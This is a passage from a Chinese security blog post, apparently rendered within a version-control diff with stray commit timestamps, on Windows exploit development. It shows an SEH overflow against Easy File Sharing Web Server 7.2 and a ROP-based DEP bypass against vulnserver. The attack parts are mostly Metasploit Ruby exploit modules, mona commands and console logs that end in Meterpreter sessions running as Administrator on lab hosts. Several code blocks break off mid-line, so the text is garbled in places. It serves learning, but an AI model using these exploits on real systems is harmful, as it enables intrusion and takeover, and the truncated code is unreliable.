< p > 删除cat造成的多余字符0x0a< br > < figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > vim -bz.txt< / span > < br > < span class = "line" > # In Vim< / span > < br > < span class = "line" > :%!xxd< / span > < br > < span class = "line" > # After editing, use the instruction below to save< / span > < br > < span class = "line" > :%!xxd -r< / span > < br > < / pre > < / td > < / tr > < / table > < / figure > < / p >
2019-07-10 09:03:44 +00:00
< ol start = "2" >
< li > 构造SEH链< / li >
< / ol >
< ul >
< li > 将Easy File Sharing Web Server 7.2加载到ImmunityDebugger中, 并处于运行状态。< / li >
< li > 发送溢出字符序列< / li >
2019-07-26 01:02:13 +00:00
< li > 查看Easy File Sharing Web Server 7.2溢出地址< br > < img src = "https://res.cloudinary.com/dozyfkbg3/image/upload/v1562744240/pwn/231.png" alt > < / li >
2019-07-10 09:03:44 +00:00
< / ul >
< ol start = "3" >
< li > 计算偏移量< br > 计算catch块偏移量& 计算下一条SEH记录偏移量< / li >
< / ol >
< h2 id = "寻找PPR" > < a href = "#寻找PPR" class = "headerlink" title = "寻找PPR" > < / a > 寻找PPR< / h2 > < ol >
2019-07-14 07:58:13 +00:00
< li > 使用mona寻找< br > 需要POP/POP/RET指令的地址来载入下一条SEH记录的地址, 并跳转到攻击载荷< figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > !mona modules< / span > < br > < span class = "line" > !mona seh< / span > < br > < / pre > < / td > < / tr > < / table > < / figure >
2019-07-10 09:03:44 +00:00
< / li >
< / ol >
< h2 id = "自动化攻击-1" > < a href = "#自动化攻击-1" class = "headerlink" title = "自动化攻击" > < / a > 自动化攻击< / h2 > < ol >
< li > < p > 编写攻击脚本< / p >
< figure class = "highlight ruby" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < span class = "line" > 14< / span > < br > < span class = "line" > 15< / span > < br > < span class = "line" > 16< / span > < br > < span class = "line" > 17< / span > < br > < span class = "line" > 18< / span > < br > < span class = "line" > 19< / span > < br > < span class = "line" > 20< / span > < br > < span class = "line" > 21< / span > < br > < span class = "line" > 22< / span > < br > < span class = "line" > 23< / span > < br > < span class = "line" > 24< / span > < br > < span class = "line" > 25< / span > < br > < span class = "line" > 26< / span > < br > < span class = "line" > 27< / span > < br > < span class = "line" > 28< / span > < br > < span class = "line" > 29< / span > < br > < span class = "line" > 30< / span > < br > < span class = "line" > 31< / span > < br > < span class = "line" > 32< / span > < br > < span class = "line" > 33< / span > < br > < span class = "line" > 34< / span > < br > < span class = "line" > 35< / span > < br > < span class = "line" > 36< / span > < br > < span class = "line" > 37< / span > < br > < span class = "line" > 38< / span > < br > < span class = "line" > 39< / span > < br > < span class = "line" > 40< / span > < br > < span class = "line" > 41< / span > < br > < span class = "line" > 42< / span > < br > < span class = "line" > 43< / span > < br > < span class = "line" > 44< / span > < br > < span class = "line" > 45< / span > < br > < span class = "line" > 46< / span > < br > < span class = "line" > 47< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > < span class = "keyword" > require< / span > < span class = "string" > 'msf/core'< / span > < / span > < br > < span class = "line" > < span class = "class" > < span class = "keyword" > class< / span > < span class = "title" > MetasploitModule< / span > < Msf::Exploit::< span class = "title" > Remote< / span > < / span > < / span > < br > < span class = "line" > Rank = NormalRanking< / span > < br > < span class = "line" > < span class = "keyword" > include< / span > Msf::Exploit::Remote::Tcp< / span > < br > < span class = "line" > < span class = "keyword" > include< / span > Msf::Exploit::Seh< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > < span class = "function" > < span class = "keyword" > def< / span > < span class = "title" > initialize< / span > < span class = "params" > (info = { } )< / span > < / span > < / span > < br > < span class = "line" > < span class = "keyword" > super< / span > (update_info(info,< / span > < br > < span class = "line" > < span class = "string" > 'Name'< / span > => < span class = "string" > 'Easy File Sharing HTTP Server 7.2 SEH Overflow'< / span > ,< / span > < br > < span class = "line" > < span class = "string" > 'Description'< / span > => < span class = "string" > %q{ < / span > < / span > < br > < span class = "line" > < span class = "string" > This Module Demonstrate SEH based overflow example< / span > < / span > < br > < span class = "line" > < span class = "string" > } < / span > ,< / span > < br > < span class = "line" > < span class = "string" > 'Author'< / span > => < span class = "string" > 'yanhan'< / span > ,< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > < span class = "string" > 'Payload'< / span > => < / span > < br > < span class = "line" > { < / span > < br > < span class = "line" > < span class = "string" > 'Space'< / span > => < span class = "number" > 390< / span > ,< / span > < br > < span class = "line" > < span class = "string" > 'BadChars'< / span > => < span class = "string" > "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e"< / span > < / span > < br > < span class = "line" > } ,< / span > < br > < span class = "line" > < span class = "string" > 'Platform'< / span > => < span class = "string" > 'Windows'< / span > ,< / span > < br > < span class = "line" > < span class = "string" > 'Targets'< / span > => < / span > < br > < span class = "line" > [< / span > < br > < span class = "line" > [< / span > < br > < span class = "line" > < span class = "string" > 'Easy File Sharing 7.2 HTTP'< / span > ,< / span > < br > < span class = "line" > { < / span > < br > < span class = "line" > < span class = "string" > 'Ret'< / span > => < span class = "number" > 0x10022fd
< / li >
< li > < p > exploit< / p >
2019-07-14 07:58:13 +00:00
< figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < span class = "line" > 14< / span > < br > < span class = "line" > 15< / span > < br > < span class = "line" > 16< / span > < br > < span class = "line" > 17< / span > < br > < span class = "line" > 18< / span > < br > < span class = "line" > 19< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > msf5 > use exploit/windows/yanhan/seh_attack< / span > < br > < span class = "line" > msf5 exploit(windows/yanhan/seh_attack) > set rhosts 192.168.31.114< / span > < br > < span class = "line" > rhosts => 192.168.31.114< / span > < br > < span class = "line" > msf5 exploit(windows/yanhan/seh_attack) > set rport 80< / span > < br > < span class = "line" > rport => 80< / span > < br > < span class = "line" > msf5 exploit(windows/yanhan/seh_attack) > exploit< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > [*] Started reverse TCP handler on 192.168.31.84:4444< / span > < br > < span class = "line" > [*] Exploit completed, but no session was created.< / span > < br > < span class = "line" > msf5 exploit(windows/yanhan/seh_attack) > set payload windows/meterpreter/bind_tcp< / span > < br > < span class = "line" > payload => windows/meterpreter/bind_tcp< / span > < br > < span class = "line" > msf5 exploit(windows/yanhan/seh_attack) > exploit< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > [*] Started bind TCP handler against 192.168.31.114:4444< / span > < br > < span class = "line" > [*] Sending stage (179779 bytes) to 192.168.31.114< / span > < br > < span class = "line" > [*] Meterpreter session 1 opened (192.168.31.84:46601 -> 192.168.31.114:4444) at 2019-07-10 16:43:47 +0800< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > meterpreter > getuid< / span > < br > < span class = "line" > Server username: WHU-3E3EECEBFD1\Administrator< / span > < br > < / pre > < / td > < / tr > < / table > < / figure >
2019-07-10 09:03:44 +00:00
< / li >
< / ol >
2019-07-14 07:58:13 +00:00
< hr >
2019-07-10 09:03:44 +00:00
< h1 id = "0x03-绕过DEP" > < a href = "#0x03-绕过DEP" class = "headerlink" title = "0x03 绕过DEP" > < / a > 0x03 绕过DEP< / h1 > < blockquote >
< p > < strong > 目标程序< / strong > < a href = "http://www.thegreycorner.com/2010/12/introducing-vulnserver.html" target = "_blank" rel = "noopener" > Introducing Vulnserver< / a > < br > < strong > 使用< / strong > vulnserver.exe 6666< br > < strong > 漏洞点< / strong > < img src = "https://res.cloudinary.com/dozyfkbg3/image/upload/v1562744461/%E5%9B%BE%E7%89%8712.png" alt > < / p >
< / blockquote >
2019-07-26 01:02:13 +00:00
< h2 id = "设置DEP保护" > < a href = "#设置DEP保护" class = "headerlink" title = "设置DEP保护" > < / a > 设置DEP保护< / h2 > < p > < img src = "https://res.cloudinary.com/dozyfkbg3/image/upload/v1562744518/pwn/%E6%8D%9511%E8%8E%B7.png" alt > < br > < em > 构建ROP链来调用VirtualProtect()关闭DEP并执行Shellcode< / em > < / p >
2019-07-10 09:03:44 +00:00
< h2 id = "计算偏移量" > < a href = "#计算偏移量" class = "headerlink" title = "计算偏移量" > < / a > 计算偏移量< / h2 > < p > < code > ' TRUN .' +make_nops(target[' Offset' ])< / code > < br > Immunity附加进程之后, 在服务端发送3000个字符, 计算偏移< / p >
< h2 id = "创建ROP链" > < a href = "#创建ROP链" class = "headerlink" title = "创建ROP链" > < / a > 创建ROP链< / h2 > < p > < code > !mona rop -m *.dll -cp nonull< / code > < br > < figure class = "highlight ruby" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < span class = "line" > 14< / span > < br > < span class = "line" > 15< / span > < br > < span class = "line" > 16< / span > < br > < span class = "line" > 17< / span > < br > < span class = "line" > 18< / span > < br > < span class = "line" > 19< / span > < br > < span class = "line" > 20< / span > < br > < span class = "line" > 21< / span > < br > < span class = "line" > 22< / span > < br > < span class = "line" > 23< / span > < br > < span class = "line" > 24< / span > < br > < span class = "line" > 25< / span > < br > < span class = "line" > 26< / span > < br > < span class = "line" > 27< / span > < br > < span class = "line" > 28< / span > < br > < span class = "line" > 29< / span > < br > < span class = "line" > 30< / span > < br > < span class = "line" > 31< / span > < br > < span class = "line" > 32< / span > < br > < span class = "line" > 33< / span > < br > < span class = "line" > 34< / span > < br > < span class = "line" > 35< / span > < br > < span class = "line" > 36< / span > < br > < span class = "line" > 37< / span > < br > < span class = "line" > 38< / span > < br > < span class = "line" > 39< / span > < br > < span class = "line" > 40< / span > < br > < span class = "line" > 41< / span > < br > < span class = "line" > 42< / span > < br > < span class = "line" > 43< / span > < br > < span class = "line" > 44< / span > < br > < span class = "line" > 45< / span > < br > < span class = "line" > 46< / span > < br > < span class = "line" > 47< / span > < br > < span class = "line" > 48< / span > < br > < span class = "line" > 49< / span > < br > < span class = "line" > 50< / span > < br > < span class = "line" > 51< / span > < br > < span class = "line" > 52< / span > < br > < span class = "line" > 53< / span > < br > < span class = "line" > 54< / span > < br > < span class = "line" > 55< / span > < br > < span class = "line" > 56< / span > < br > < span class = "line" > 57< / span > < br > < span class = "line" > 58< / span > < br > < span class = "line" > 59< / span > < br > < span class = "line" > 60< / span > < br > < span class = "line" > 61< / span > < br > < span class = "line" > 62< / span > < br > < span class = "line" > 63< / span > < br > < span class = "line" > 64< / span > < br > < span class = "line" > 65< / span > < br > < span class = "line" > 66< / span > < br > < span class = "line" > 67< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > < span class = "comment" > ################################################################################< / span > < / span > < br > < span class = "line" > < / span > < br > < span class = "line" > Register setup < span class = "keyword" > for< / span > VirtualProtect() < span class = "symbol" > :< / span > < / span > < br > < span class = "line" > --------------------------------------------< / span > < br > < span class = "line" > EAX = NOP (< span class = "number" > 0x90909090< / span > )< / span > < br > < span class = "line" > ECX = lpOldProtect (ptr to W address)< / span > < br > < span class = "line" > EDX = NewProtect (< span class = "number" > 0x40< / span > )< / span > < br > < span class = "line" > EBX = dwSize< / span > < br > < span class = "line" > ESP = lPAddress (automatic)< / span > < br > < span class = "line" > EBP = ReturnTo (ptr to jmp esp)< / span > < br > < span class = "line" > ESI = ptr to VirtualProtect()< / span > < br > < span class = "line" > EDI = ROP NOP (RETN)< / span > < br > < span class = "line" > --- alternative chain ---< / span > < br > < span class = "line" > EAX = ptr to & VirtualProtect()< / span > < br > < span class = "line" > ECX = lpOldProtect (ptr to W address)< / span > < br > < span class = "line" > EDX = NewProtect (< span class = "number" > 0x40< / span > )< / span > < br > < span class = "line" > EBX = dwSize< / span > < br > < span class = "line" > ESP = lPAddress (automatic)< / span > < br > < span class = "line" > EBP = POP (skip < span class = "number" > 4< / span > bytes)< / span > < br > < span class = "line" > ESI = ptr to JMP [EAX]< / span > < br > < span class = "line" > EDI = ROP NOP (RETN)< / span > < br > < span class = "line" > + place ptr to < span class = "string" > "jmp esp"< / span > on stack, below PUSHAD< / span > < br > < span class = "line" > --------------------------------------------< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > < / span > < br > < span class = "line" > ROP Chain < span
< h2 id = "自动化攻击-2" > < a href = "#自动化攻击-2" class = "headerlink" title = "自动化攻击" > < / a > 自动化攻击< / h2 > < figure class = "highlight ruby" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < span class = "line" > 14< / span > < br > < span class = "line" > 15< / span > < br > < span class = "line" > 16< / span > < br > < span class = "line" > 17< / span > < br > < span class = "line" > 18< / span > < br > < span class = "line" > 19< / span > < br > < span class = "line" > 20< / span > < br > < span class = "line" > 21< / span > < br > < span class = "line" > 22< / span > < br > < span class = "line" > 23< / span > < br > < span class = "line" > 24< / span > < br > < span class = "line" > 25< / span > < br > < span class = "line" > 26< / span > < br > < span class = "line" > 27< / span > < br > < span class = "line" > 28< / span > < br > < span class = "line" > 29< / span > < br > < span class = "line" > 30< / span > < br > < span class = "line" > 31< / span > < br > < span class = "line" > 32< / span > < br > < span class = "line" > 33< / span > < br > < span class = "line" > 34< / span > < br > < span class = "line" > 35< / span > < br > < span class = "line" > 36< / span > < br > < span class = "line" > 37< / span > < br > < span class = "line" > 38< / span > < br > < span class = "line" > 39< / span > < br > < span class = "line" > 40< / span > < br > < span class = "line" > 41< / span > < br > < span class = "line" > 42< / span > < br > < span class = "line" > 43< / span > < br > < span class = "line" > 44< / span > < br > < span class = "line" > 45< / span > < br > < span class = "line" > 46< / span > < br > < span class = "line" > 47< / span > < br > < span class = "line" > 48< / span > < br > < span class = "line" > 49< / span > < br > < span class = "line" > 50< / span > < br > < span class = "line" > 51< / span > < br > < span class = "line" > 52< / span > < br > < span class = "line" > 53< / span > < br > < span class = "line" > 54< / span > < br > < span class = "line" > 55< / span > < br > < span class = "line" > 56< / span > < br > < span class = "line" > 57< / span > < br > < span class = "line" > 58< / span > < br > < span class = "line" > 59< / span > < br > < span class = "line" > 60< / span > < br > < span class = "line" > 61< / span > < br > < span class = "line" > 62< / span > < br > < span class = "line" > 63< / span > < br > < span class = "line" > 64< / span > < br > < span class = "line" > 65< / span > < br > < span class = "line" > 66< / span > < br > < span class = "line" > 67< / span > < br > < span class = "line" > 68< / span > < br > < span class = "line" > 69< / span > < br > < span class = "line" > 70< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > < span class = "keyword" > require< / span > < span class = "string" > 'msf/core'< / span > < / span > < br > < span class = "line" > < span class = "class" > < span class = "keyword" > class< / span > < span class = "title" > Metasploit3< / span > < Msf::Exploit::< span class = "title" > Remote< / span > < / span > < / span > < br > < span class = "line" > Rank = NormalRanking< / span > < br > < span class = "line" > < span class = "keyword" > include< / span > Msf::Exploit::Remote::Tcp< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > < span class = "function" > < span class = "keyword" > def< / span > < span class = "title" > initialize< / span > < span class = "params" > (info = { } )< / span > < / span > < / span > < br > < span class = "line" > < span class = "keyword" > super< / span > (update_info(info,< / span > < br > < span class = "line" > < span class = "string" > 'Name'< / span > => < span class = "string" > 'DEP Bypass Exploit'< / span > ,< / span > < br > < span class = "line" > < span class = "string" > 'Description'< / span > => < span class = "string" > %q{ < / span > < / span > < br > < span class = "line" > < span class = "string" > DEP Bypass Using ROP Chains Example Module< / span > < / span > < br > < span class = "line" > < span class = "string" > } < / span > ,< / span > < br > < span class = "line" > < span class = "string" > 'Platform'< / span > => < span class = "string" > 'Windows'< / span > ,< / span > < br > < span class = "line" > < span class = "string" > 'Author'< / span > => < span class = "string" > 'yanhan'< / span > ,< / span > < br > < span class = "line" > < span class = "string" > 'Payload'< / span > => < / span > < br > < span class = "line" > { < / span > < br > < span class = "line" > < span class = "string" > 'space'< / span > => < s
2019-07-14 07:58:13 +00:00
< figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < span class = "line" > 14< / span > < br > < span class = "line" > 15< / span > < br > < span class = "line" > 16< / span > < br > < span class = "line" > 17< / span > < br > < span class = "line" > 18< / span > < br > < span class = "line" > 19< / span > < br > < span class = "line" > 20< / span > < br > < span class = "line" > 21< / span > < br > < span class = "line" > 22< / span > < br > < span class = "line" > 23< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > msf5 > use exploit/windows/yanhan/rop_attack< / span > < br > < span class = "line" > msf5 exploit(windows/yanhan/rop_attack) > set rhosts 192.168.31.114< / span > < br > < span class = "line" > rhosts => 192.168.31.114< / span > < br > < span class = "line" > msf5 exploit(windows/yanhan/rop_attack) > set rport 1000< / span > < br > < span class = "line" > rport => 1000< / span > < br > < span class = "line" > msf5 exploit(windows/yanhan/rop_attack) > exploit< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > [*] Started reverse TCP handler on 192.168.31.84:4444< / span > < br > < span class = "line" > [*] Exploit completed, but no session was created.< / span > < br > < span class = "line" > msf5 exploit(windows/yanhan/rop_attack) > set payload windows/meterpreter/bind_tcp< / span > < br > < span class = "line" > payload => windows/meterpreter/bind_tcp< / span > < br > < span class = "line" > msf5 exploit(windows/yanhan/rop_attack) > exploit< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > [*] Started bind TCP handler against 192.168.31.114:4444< / span > < br > < span class = "line" > [*] Exploit completed, but no session was created.< / span > < br > < span class = "line" > msf5 exploit(windows/yanhan/rop_attack) > exploit< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > [*] Started bind TCP handler against 192.168.31.114:4444< / span > < br > < span class = "line" > [*] Sending stage (179779 bytes) to 192.168.31.114< / span > < br > < span class = "line" > [*] Meterpreter session 1 opened (192.168.31.84:44537 -> 192.168.31.114:4444) at 2019-07-10 16:51:07 +0800< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > meterpreter > getuid< / span > < br > < span class = "line" > Server username: WHU-3E3EECEBFD1\Administrator< / span > < br > < / pre > < / td > < / tr > < / table > < / figure >
2019-07-10 09:03:44 +00:00
< / div >
< div >
< div style = "padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;" >
< div > 您的支持将鼓励我继续创作!< / div >
< button id = "rewardButton" disable = "enable" onclick = "var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}" >
< span > 打赏< / span >
< / button >
< div id = "QR" style = "display: none;" >
< div id = "wechat" style = "display: inline-block" >
< img id = "wechat_qr" src = "/images/Wechatpay.png" alt = "Cool-Y 微信支付" >
< p > 微信支付< / p >
< / div >
< div id = "alipay" style = "display: inline-block" >
< img id = "alipay_qr" src = "/images/Alipay.png" alt = "Cool-Y 支付宝" >
< p > 支付宝< / p >
< / div >
< / div >
< / div >
< / div >
< footer class = "post-footer" >
< div class = "post-tags" >
< a href = "/tags/二进制/" rel = "tag" > # 二进制< / a >
< a href = "/tags/Windows/" rel = "tag" > # Windows< / a >
< a href = "/tags/漏洞/" rel = "tag" > # 漏洞< / a >
< / div >
< div class = "post-nav" >
< div class = "post-nav-next post-nav-item" >
< a href = "/2019/07/09/afl-first-try/" rel = "next" title = "AFL-爱之初体验" >
< i class = "fa fa-chevron-left" > < / i > AFL-爱之初体验
< / a >
< / div >
< span class = "post-nav-divider" > < / span >
< div class = "post-nav-prev post-nav-item" >
2019-07-16 09:15:34 +00:00
< a href = "/2019/07/16/linux-pwn-32/" rel = "prev" title = "Linux Pwn-缓冲区溢出利用" >
Linux Pwn-缓冲区溢出利用 < i class = "fa fa-chevron-right" > < / i >
< / a >
2019-07-10 09:03:44 +00:00
< / div >
< / div >
< / footer >
< / div >
< / article >
< div class = "post-spread" >
< / div >
< / div >
< / div >
< div class = "comments" id = "comments" >
< div id = "gitment-container" > < / div >
< / div >
< / div >
< div class = "sidebar-toggle" >
< div class = "sidebar-toggle-line-wrap" >
< span class = "sidebar-toggle-line sidebar-toggle-line-first" > < / span >
< span class = "sidebar-toggle-line sidebar-toggle-line-middle" > < / span >
< span class = "sidebar-toggle-line sidebar-toggle-line-last" > < / span >
< / div >
< / div >
< aside id = "sidebar" class = "sidebar" >
< div class = "sidebar-inner" >
< ul class = "sidebar-nav motion-element" >
< li class = "sidebar-nav-toc sidebar-nav-active" data-target = "post-toc-wrap" >
文章目录
< / li >
< li class = "sidebar-nav-overview" data-target = "site-overview-wrap" >
站点概览
< / li >
< / ul >
< section class = "site-overview-wrap sidebar-panel" >
< div class = "site-overview" >
< div class = "site-author motion-element" itemprop = "author" itemscope itemtype = "http://schema.org/Person" >
< img class = "site-author-image" itemprop = "image" src = "/images/avatar.png" alt = "Cool-Y" >
< p class = "site-author-name" itemprop = "name" > Cool-Y< / p >
2019-07-24 03:51:42 +00:00
< p class = "site-description motion-element" itemprop = "description" > 没人比我更懂中医#MAGA< / p >
2019-07-10 09:03:44 +00:00
< / div >
< nav class = "site-state motion-element" >
< div class = "site-state-item site-state-posts" >
< a href = "/archives/" >
2019-07-25 14:22:59 +00:00
< span class = "site-state-item-count" > 22< / span >
2019-07-10 09:03:44 +00:00
< span class = "site-state-item-name" > 日志< / span >
< / a >
< / div >
< div class = "site-state-item site-state-categories" >
< a href = "/categories/index.html" >
2019-07-25 14:22:59 +00:00
< span class = "site-state-item-count" > 8< / span >
2019-07-10 09:03:44 +00:00
< span class = "site-state-item-name" > 分类< / span >
< / a >
< / div >
< div class = "site-state-item site-state-tags" >
< a href = "/tags/index.html" >
2019-07-25 14:22:59 +00:00
< span class = "site-state-item-count" > 44< / span >
2019-07-10 09:03:44 +00:00
< span class = "site-state-item-name" > 标签< / span >
< / a >
< / div >
< / nav >
< div class = "links-of-author motion-element" >
< span class = "links-of-author-item" >
< a href = "https://github.com/Cool-Y" target = "_blank" title = "GitHub" >
< i class = "fa fa-fw fa-github" > < / i > GitHub< / a >
< / span >
< span class = "links-of-author-item" >
< a href = "mailto:cool.yim@whu.edu.cn" target = "_blank" title = "E-Mail" >
< i class = "fa fa-fw fa-envelope" > < / i > E-Mail< / a >
< / span >
< span class = "links-of-author-item" >
< a href = "https://www.instagram.com/yan__han/" target = "_blank" title = "Instagram" >
< i class = "fa fa-fw fa-instagram" > < / i > Instagram< / a >
< / span >
< / div >
< / div >
< / section >
<!-- noindex -->
< section class = "post-toc-wrap motion-element sidebar-panel sidebar-panel-active" >
< div class = "post-toc" >
2019-07-14 07:58:13 +00:00
< div class = "post-toc-content" > < ol class = "nav" > < li class = "nav-item nav-level-1" > < a class = "nav-link" href = "#0x00-漏洞利用开发简介" > < span class = "nav-text" > 0x00 漏洞利用开发简介< / span > < / a > < / li > < li class = "nav-item nav-level-1" > < a class = "nav-link" href = "#0x01-简单栈溢出" > < span class = "nav-text" > 0x01 简单栈溢出< / span > < / a > < ol class = "nav-child" > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#漏洞点" > < span class = "nav-text" > 漏洞点< / span > < / a > < / li > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#关闭防御措施" > < span class = "nav-text" > 关闭防御措施< / span > < / a > < / li > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#整体的攻击流程" > < span class = "nav-text" > 整体的攻击流程< / span > < / a > < / li > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#确定溢出点的位置" > < span class = "nav-text" > 确定溢出点的位置< / span > < / a > < / li > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#寻找jmp-esp跳板" > < span class = "nav-text" > 寻找jmp esp跳板< / span > < / a > < / li > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#自动化攻击" > < span class = "nav-text" > 自动化攻击< / span > < / a > < / li > < / ol > < / li > < li class = "nav-item nav-level-1" > < a class = "nav-link" href = "#0x02-基于SEH的栈溢出" > < span class = "nav-text" > 0x02 基于SEH的栈溢出< / span > < / a > < ol class = "nav-child" > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#确定溢出点的位置-1" > < span class = "nav-text" > 确定溢出点的位置< / span > < / a > < / li > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#寻找PPR" > < span class = "nav-text" > 寻找PPR< / span > < / a > < / li > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#自动化攻击-1" > < span class = "nav-text" > 自动化攻击< / span > < / a > < / li > < / ol > < / li > < li class = "nav-item nav-level-1" > < a class = "nav-link" href = "#0x03-绕过DEP" > < span class = "nav-text" > 0x03 绕过DEP< / span > < / a > < ol class = "nav-child" > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#设置DEP保护" > < span class = "nav-text" > 设置DEP保护< / span > < / a > < / li > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#计算偏移量" > < span class = "nav-text" > 计算偏移量< / span > < / a > < / li > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#创建ROP链" > < span class = "nav-text" > 创建ROP链< / span > < / a > < / li > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#自动化攻击-2" > < span class = "nav-text" > 自动化攻击< / span > < / a > < / li > < / ol > < / li > < / ol > < / div >
2019-07-10 09:03:44 +00:00
< / div >
< / section >
<!-- /noindex -->
< / div >
< / aside >
< / div >
< / main >
< footer id = "footer" class = "footer" >
< div class = "footer-inner" >
< div class = "copyright" > © < span itemprop = "copyrightYear" > 2019< / span >
< span class = "with-love" >
< i class = "fa fa-user" > < / i >
< / span >
< span class = "author" itemprop = "copyrightHolder" > Cool-Y< / span >
< span class = "post-meta-divider" > |< / span >
< span class = "post-meta-item-icon" >
< i class = "fa fa-area-chart" > < / i >
< / span >
2019-07-27 06:42:04 +00:00
< span title = "Site words total count" > 67.7k< / span >
2019-07-10 09:03:44 +00:00
< / div >
< div class = "powered-by" > 由 < a class = "theme-link" target = "_blank" href = "https://hexo.io" > Hexo< / a > 强力驱动< / div >
< div class = "busuanzi-count" >
< script async src = "//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" > < / script >
< span class = "site-uv" >
< i class = "fa fa-user" > < / i >
< span class = "busuanzi-value" id = "busuanzi_value_site_uv" > < / span >
< / span >
< span class = "site-pv" >
< i class = "fa fa-eye" > < / i >
< span class = "busuanzi-value" id = "busuanzi_value_site_pv" > < / span >
< / span >
< / div >
< / div >
< / footer >
< div class = "back-to-top" >
< i class = "fa fa-arrow-up" > < / i >
< / div >
< / div >
< script type = "text/javascript" >
if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
window.Promise = null;
}
< / script >
< script type = "text/javascript" src = "/lib/jquery/index.js?v=2.1.3" > < / script >
< script type = "text/javascript" src = "/lib/fastclick/lib/fastclick.min.js?v=1.0.6" > < / script >
< script type = "text/javascript" src = "/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7" > < / script >
< script type = "text/javascript" src = "/lib/velocity/velocity.min.js?v=1.2.1" > < / script >
< script type = "text/javascript" src = "/lib/velocity/velocity.ui.min.js?v=1.2.1" > < / script >
< script type = "text/javascript" src = "/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5" > < / script >
< script type = "text/javascript" src = "/js/src/utils.js?v=5.1.4" > < / script >
< script type = "text/javascript" src = "/js/src/motion.js?v=5.1.4" > < / script >
< script type = "text/javascript" src = "/js/src/affix.js?v=5.1.4" > < / script >
< script type = "text/javascript" src = "/js/src/schemes/pisces.js?v=5.1.4" > < / script >
< script type = "text/javascript" src = "/js/src/scrollspy.js?v=5.1.4" > < / script >
< script type = "text/javascript" src = "/js/src/post-details.js?v=5.1.4" > < / script >
